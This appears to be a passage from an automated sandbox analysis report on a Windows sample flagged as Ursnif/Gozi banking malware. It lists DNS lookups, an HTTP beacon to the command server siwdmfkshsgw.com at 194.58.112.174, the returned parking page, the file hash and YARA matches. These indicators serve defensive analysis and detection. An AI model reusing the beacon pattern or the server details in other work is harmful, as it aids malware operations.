                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625850916 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625850916 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:23.624783039 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:23.624878883 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:37.908591032 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:37.970499992 CEST8049695194.58.112.174192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2022 08:29:48.101234913 CEST5657253192.168.2.48.8.8.8
                                Oct 26, 2022 08:29:48.120796919 CEST53565728.8.8.8192.168.2.4
                                Oct 26, 2022 08:31:08.411577940 CEST5091153192.168.2.48.8.8.8
                                Oct 26, 2022 08:31:08.479096889 CEST53509118.8.8.8192.168.2.4
                                Oct 26, 2022 08:31:28.725523949 CEST5968353192.168.2.48.8.8.8
                                Oct 26, 2022 08:31:28.746222973 CEST53596838.8.8.8192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 26, 2022 08:29:48.101234913 CEST192.168.2.48.8.8.80x415dStandard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:08.411577940 CEST192.168.2.48.8.8.80x70edStandard query (0)siwdmfkshsgw.comA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:28.725523949 CEST192.168.2.48.8.8.80x1b33Standard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 26, 2022 08:29:48.120796919 CEST8.8.8.8192.168.2.40x415dName error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:08.479096889 CEST8.8.8.8192.168.2.40x70edNo error (0)siwdmfkshsgw.com194.58.112.174A (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:28.746222973 CEST8.8.8.8192.168.2.40x1b33Name error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
                                • siwdmfkshsgw.com
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.449695194.58.112.17480C:\Users\user\Desktop\d2ef5.exe
                                TimestampkBytes transferredDirectionData
                                Oct 26, 2022 08:31:08.563637972 CEST93OUTGET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                Host: siwdmfkshsgw.com
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 26, 2022 08:31:08.625478983 CEST94INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 26 Oct 2022 06:31:08 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 32 61 35 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 73 69 77 64 6d 66 6b 73 68 73 67 77 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3
                                Data Ascii: 2a5c<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>siwdmfkshsgw.com</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts-content.js')" onerror="window.trackScriptLoad('/head-scripts-content.js', 1)" src="/head-scripts-content.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">


                                No statistics
                                Target ID:0
                                Start time:08:29:42
                                Start date:26/10/2022
                                Path:C:\Users\user\Desktop\d2ef5.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\d2ef5.exe
                                Imagebase:0x400000
                                File size:37888 bytes
                                MD5 hash:1D8A445BEF0C0D4A7EC519F06C23224A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                No disassembly